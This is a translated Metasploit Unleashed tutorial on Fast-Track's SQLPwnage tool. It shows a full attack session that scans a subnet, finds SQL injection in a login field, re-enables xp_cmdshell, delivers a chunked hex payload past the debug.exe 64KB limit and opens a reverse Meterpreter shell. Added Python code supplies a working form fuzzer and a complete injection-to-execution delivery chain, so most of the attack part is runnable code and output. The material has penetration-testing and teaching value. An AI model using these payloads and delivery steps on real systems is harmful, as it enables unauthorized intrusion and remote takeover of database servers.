SQL PWNAGE

From www.metasploit-es.com.ar

'SQLPwnage' is a tool for detecting potential SQL injection vulnerabilities in a web application. SQLPwnage will scan subnets and crawl entire sites in search of any kind of POST parameter. It then attempts error-based SQL injection in an effort to gain full access to the system. If it can guess the correct SQL syntax, it performs a series of attacks such as re-enabling xp_cmdshell and delivering whatever payload you choose, all through SQL injection. In the example below it will automatically crawl and attack a site we already know is vulnerable to SQL injection. SQLPwnage was written by Andrew Weidenhamer and David Kennedy. Let's see what happens.
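A minimal version of the form-fuzzing and error-matching step the paragraph above describes, added here as an example (it is not Fast-Track's or SQLPwnage's own code): it extracts the forms from a page, submits each field with quote-breaking probes, and matches the response against a list of common MSSQL error strings. The login page, the `fake_submit` handler and the signature list are constructed for the example; in practice `submit` would be an HTTP request to the form's action.

```python
import re
from html.parser import HTMLParser

# MSSQL error fragments that commonly leak through ASP/ASP.NET pages when a quote
# breaks the query (constructed list; extend it with what the target actually returns).
MSSQL_ERROR_SIGNATURES = [
    r"Unclosed quotation mark",
    r"Incorrect syntax near",
    r"System\.Data\.SqlClient\.SqlException",
    r"Microsoft OLE DB Provider for SQL Server",
    r"ODBC SQL Server Driver",
    r"\[SQL Server\]",
]
# Probes that break a quoted literal, a numeric context, or a parenthesised subquery.
PROBES = ["'", "''", "')", "1'", "' OR '1'='1"]


class FormExtractor(HTMLParser):
    """Collect every <form> with its action, method and the names of its inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": (a.get("method") or "get").lower(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "textarea", "select") and self._current is not None:
            # Skip buttons: only fields whose value reaches the query are worth fuzzing.
            if a.get("name") and (a.get("type") or "text").lower() not in ("submit", "button", "image", "reset"):
                self._current["fields"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def extract_forms(page_html):
    parser = FormExtractor()
    parser.feed(page_html)
    return parser.forms


def find_sql_error(body):
    """Return the first MSSQL error signature found in a response body, or None."""
    for sig in MSSQL_ERROR_SIGNATURES:
        if re.search(sig, body, re.IGNORECASE):
            return sig
    return None


def fuzz_form(form, submit):
    """Inject each probe into each field in turn; submit(data) -> response body.
    Returns (field, probe, signature) for the first probe that errors, per field."""
    findings = []
    for field in form["fields"]:
        for probe in PROBES:
            data = {f: "test" for f in form["fields"]}
            data[field] = "test" + probe
            sig = find_sql_error(submit(data))
            if sig:
                findings.append((field, probe, sig))
                break
    return findings


def scan(page_html, submit):
    """Mirror of the tool's flow: enumerate forms, fuzz each, report injectable fields."""
    return {form["action"]: fuzz_form(form, submit) for form in extract_forms(page_html)}


# Constructed stand-in for the target: an ASP.NET login page whose txtLogin value is
# concatenated into the query while txtPassword is handled safely.
LOGIN_PAGE = """<html><body>
<form action="login.aspx" method="post">
  <input type="text" name="txtLogin"><input type="password" name="txtPassword">
  <input type="submit" name="btnLogin" value="Login">
</form>
<form action="search.aspx" method="get"><input type="text" name="q"></form>
</body></html>"""


def fake_submit(data):
    """Constructed response: a quote in txtLogin produces the classic unhandled SqlException page."""
    if "'" in data.get("txtLogin", ""):
        return ("<h2>Server Error in '/' Application.</h2><p>System.Data.SqlClient.SqlException: "
                "Unclosed quotation mark after the character string '%s'.</p>" % data["txtLogin"])
    return "<html>Login failed.</html>"


if __name__ == "__main__":
    for action, hits in scan(LOGIN_PAGE, fake_submit).items():
        for field, probe, sig in hits:
            print("%s: SQL exception in field %r with probe %r (%s)" % (action, field, probe, sig))
```

The detection is only as good as the signature list: a site with custom error pages returns nothing here, which is exactly the case SQLPwnage's separate BLIND mode exists for.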

Fast-Track Main Menu:

Fast-Track - Where it's OK to finish in under 3 minutes...
Version: v4.0
Written by: David Kennedy (ReL1K)
http://www.securestate.com
http://www.thepentest.com

1. Fast-Track Updates
2. Autopwn Automation
3. Microsoft SQL Tools
4. Mass Client-Side Attack
5. Exploits
6. Binary to Hex Payload Converter
7. Payload Generator
8. Fast-Track Tutorials
9. Fast-Track Changelog
10. Fast-Track Credits
11. Exit

Enter the number: 3

Microsoft SQL Attack Tools

Pick a list of the tools from below:

1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage

Enter your choice : 3
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.
Default Metasploit directory set to /pentest/exploits/framework3/
Checking SQLPwnage dependencies required to run...

Dependencies installed. Welcome to SQLPwnage.


SQLPwnage written by: Andrew Weidenhamer and David Kennedy


SQLPwnage is a mass pwnage tool custom coded for Fast-Track. SQLPwnage will attempt to identify SQL Injection
in a website, scan subnet ranges for web servers, crawl entire sites, fuzz form parameters and
attempt to gain you remote access to a system. We use unique attacks never performed before in order to bypass
the 64kb debug restrictions on remote Windows systems and deploy our large payloads without restrictions.


This is all done without a stager to download remote files, the only egress connections
made are our final payload. Right now SQLPwnage supports three payloads, a reverse
tcp shell, metasploit reverse tcp meterpreter, and metasploit reverse vnc inject.

Some additional features are, elevation to "sa" role if not added, data execution prevention
(DEP) disabling, anti-virus bypassing, and much more!

This tool is the only one of its kind, and is currently still in beta.


SQLPwnage Main Menu:


1. SQL Injection Search/Exploit by Binary Payload Injection (BLIND)
2. SQL Injection Search/Exploit by Binary Payload Injection (ERROR BASED)
3. SQL Injection single URL exploitation

Enter your choice: 2

---------------------------------------------------------------
- This module has the following two options:
-
- 1) Spider a single URL looking for SQL Injection. If
-    successful in identifying SQL Injection, it will then
-    give you a choice to exploit.
-
- 2) Scan an entire subnet looking for webservers running on
-    port 80. The user will then be prompted with two
-    choices: 1) Select a website or, 2) Attempt to spider
-    all websites that were found during the scan attempting
-    to identify possible SQL Injection. If SQL Injection
-    is identified, the user will then have an option to
-    exploit.
-
- This module is based on error messages that are most
- commonly returned when SQL Injection is prevalent on a
- web application.
-
- If all goes well a reverse shell will be returned back to
- the user.
---------------------------------------------------------------

Scan a subnet or spider single URL?

1. url
2. subnet (new)
3. subnet (lists last scan)

Enter the Number: 2

Enter the ip range, example 192.168.1.1-254: 10.211.55.1-254
Scanning Complete!!! Select a website to spider or spider all??

1. Single Website
2. All Websites

Enter the Number: 2

Attempting to Spider: http://10.211.55.128
Crawling http://10.211.55.128 (Max Depth: 100000)
DONE
Found 0 links, following 0 urls in 0+0:0:0

Spidering is complete.

*************************************************************************
http://10.211.55.128
*************************************************************************


[+] Number of forms detected: 2 [+]

A SQL Exception has been encountered in the "txtLogin" input field of the above website.

What type of payload do you want?

1. Custom Packed Fast-Track Reverse Payload (AV Safe)
2. Metasploit Reverse VNC Inject (Requires Metasploit)
3. Metasploit Meterpreter Payload (Requires Metasploit)
4. Metasploit TCP Bind Shell (Requires Metasploit)
5. Metasploit Meterpreter Reflective Reverse TCP
6. Metasploit Reflective Reverse VNC

Select your choice: 5
Enter the port you want to listen on: 9090
[+] Importing 64kb debug bypass payload into Fast-Track... [+]
[+] Import complete, formatting the payload for delivery.. [+]
[+] Payload Formatting prepped and ready for launch. [+]
[+] Executing SQL commands to elevate account permissions. [+]
[+] Initiating stored procedure: 'xp_cmdshell' if disabled. [+]
[+] Delivery Complete. [+]
Created by msfpayload (http://www.metasploit.com).
Payload: windows/patchupmeterpreter/reverse_tcp
Length: 310
Options: LHOST=10.211.55.130,LPORT=9090
Launching MSFCLI Meterpreter Handler
Creating Metasploit Reverse Meterpreter Payload..
Taking raw binary and converting to hex.
Raw binary converted to straight hex.
[+] Bypassing Windows Debug 64KB Restrictions. Evil. [+]
[+] Sending chunked payload. Number 1 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 2 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 3 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 4 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 5 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 6 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 7 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 8 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 9 of 9. This may take a bit. [+]
[+] Conversion from hex to binary in progress. [+]
[+] Conversion complete. Moving the binary to an executable. [+]
[+] Splitting the hex into 100 character chunks [+]
[+] Split complete. [+]
[+] Prepping the payload for delivery. [+]
Sending chunk 1 of 3, this may take a bit...
Sending chunk 2 of 3, this may take a bit...
Sending chunk 3 of 3, this may take a bit...
Using H2B Bypass to convert our Payload to Binary..
Running cleanup before launching the payload....
[+] Launching the PAYLOAD!! This may take up to two or three minutes. [+]
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (718347 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.211.55.130:9090 -> 10.211.55.128:1031)

meterpreter >

Whew! Made that look easy... Fast-Track managed to gain access and deliver the payload, all through SQL injection! The interesting part of all this is the payload. Once Fast-Track identifies the SQL injection, it takes the options specified during the initial setup and creates a Metasploit payload in executable format. That executable is then converted into raw hex, so the output is just a straight hex blob. A custom payload written specifically for Fast-Track is delivered to the victim machine: this initial payload is a 5kb hex-based application that is dropped in hex form onto the underlying operating system and rebuilt into a binary with Windows debug. The main limitation of this method is that every payload MUST be under 64KB in size; if the payload is over that size, debug bombs out and no application is produced. Fast-Track's custom payload weighs in at 5kb, so it converts cleanly; once it is back in binary form it reads the raw hex of the real payload and writes it out as a binary file, thus bypassing the 64KB limitation. This method was first introduced by Scott White of SecureState at Defcon 2008 and has been incorporated into Fast-Track's SQLPwnage and SQLBruter attacks.
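The delivery chain described above, added here as an example (it is not Fast-Track's own code): it generates the T-SQL that re-enables xp_cmdshell, hex-encodes a payload and splits it into 100-character `echo` statements, builds the debug.exe script that rebuilds a small stager (enforcing the single-segment limit that produces the 64KB restriction), and models what the hex-to-binary stager does on the target so the round trip can be checked offline. The drop paths, file names, the stager's command line and the tiny placeholder binaries are assumptions; the injection wrapper assumes a string parameter such as txtLogin and a back end that allows stacked queries.

```python
import binascii

# Placeholder target-side paths (assumption, not Fast-Track's). debug.exe refuses to write
# files named .exe or .hex, so the stager is written as .dll and renamed afterwards.
HEX_DROP = r"C:\Windows\Temp\p.hex"
PAYLOAD_EXE = r"C:\Windows\Temp\p.exe"
STAGER_SCRIPT = r"C:\Windows\Temp\s.txt"
STAGER_DLL = r"C:\Windows\Temp\s.dll"
STAGER_EXE = r"C:\Windows\Temp\s.exe"
CHUNK = 100
DEBUG_MAX = 0x10000 - 0x100   # bytes are entered at CS:0100 inside debug's single 64KB segment


def enable_xp_cmdshell_sql():
    """T-SQL that turns xp_cmdshell back on (SQL Server 2005+ ships with it disabled).
    Needs sysadmin rights, which is why the tool elevates to 'sa' first."""
    return ("EXEC sp_configure 'show advanced options',1;RECONFIGURE;"
            "EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE")


def xp_cmd(cmd):
    """One xp_cmdshell call. `cmd` must not contain single quotes, which would end the literal."""
    if "'" in cmd:
        raise ValueError("single quote in command would break the xp_cmdshell literal")
    return "EXEC master..xp_cmdshell '%s'" % cmd


def xp_echo(line, path):
    """Append one line to a file on the target. The space before >> keeps cmd from treating a
    trailing digit as a file-handle number; the readers below ignore the extra whitespace."""
    return xp_cmd("echo %s >>%s" % (line, path))


def split_chunks(text, size=CHUNK):
    return [text[i:i + size] for i in range(0, len(text), size)]


def hex_echo_statements(payload, path=HEX_DROP):
    """Drop the payload as raw hex, CHUNK characters per call (the 'Sending chunk n of m' step)."""
    return [xp_echo(c, path) for c in split_chunks(binascii.hexlify(payload).decode())]


def inject_via_field(sql):
    """Ride a statement in a vulnerable string parameter such as txtLogin: close the literal,
    stack the statement, comment out the rest of the original query."""
    return "';" + sql + ";--"


def fits_in_debug(data):
    return len(data) <= DEBUG_MAX


def debug_script(data, out_name=STAGER_DLL):
    """debug.exe script that recreates `data` as `out_name`: enter bytes at CS:0100, set CX to
    the length, write, quit. This is the path bound by the 64KB limit."""
    if not fits_in_debug(data):
        raise ValueError("%d bytes exceeds debug.exe's single-segment limit of %d" % (len(data), DEBUG_MAX))
    if out_name.lower().endswith((".exe", ".hex")):
        raise ValueError("debug.exe refuses to write .exe/.hex files; use .dll or .com and rename")
    lines = ["n " + out_name]
    for off in range(0, len(data), 16):
        block = data[off:off + 16]
        lines.append("e %04x %s" % (0x100 + off, " ".join("%02x" % b for b in block)))
    lines += ["rcx", "%x" % len(data), "w", "q"]
    return lines


def dropped_hex_file(payload):
    """Offline model of what the echo statements leave on disk: 'chunk ' + CRLF per call."""
    return "".join(c + " \r\n" for c in split_chunks(binascii.hexlify(payload).decode()))


def h2b(hex_text):
    """What the small stager does on the target: ignore whitespace and rebuild the binary.
    No size limit applies here, which is how the 64KB debug restriction is bypassed."""
    return binascii.unhexlify("".join(hex_text.split()))


def delivery_plan(stager, payload):
    """Ordered injection strings: enable xp_cmdshell, drop the debug script, rebuild and rename
    the stager, drop the large payload as hex, then let the stager convert and run it."""
    steps = [enable_xp_cmdshell_sql()]
    steps += [xp_echo(line, STAGER_SCRIPT) for line in debug_script(stager)]
    steps.append(xp_cmd("debug <%s && ren %s s.exe" % (STAGER_SCRIPT, STAGER_DLL)))
    steps += hex_echo_statements(payload)
    # Assumed stager command line: <stager> <hex file> <output exe>
    steps.append(xp_cmd("%s %s %s && %s" % (STAGER_EXE, HEX_DROP, PAYLOAD_EXE, PAYLOAD_EXE)))
    return [inject_via_field(s) for s in steps]


if __name__ == "__main__":
    # Placeholder binaries: a 4-byte "stager" and a 700-byte "payload" stand in for real ones.
    for s in delivery_plan(b"MZ\x90\x00", b"\xcc" * 700):
        print(s)
```

Two caveats a practitioner will hit: debug.exe is a 16-bit program that exists only on 32-bit Windows, so on an x64 host the rebuild step fails and a different file-write primitive is needed; and every `echo` is a separate round trip through the injection, which is why the transcript above takes several minutes for a few hundred kilobytes.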



© Offensive Security 2009

Original by www.offensive-security.com/metasploit-unleashed/
Translated by tundervirld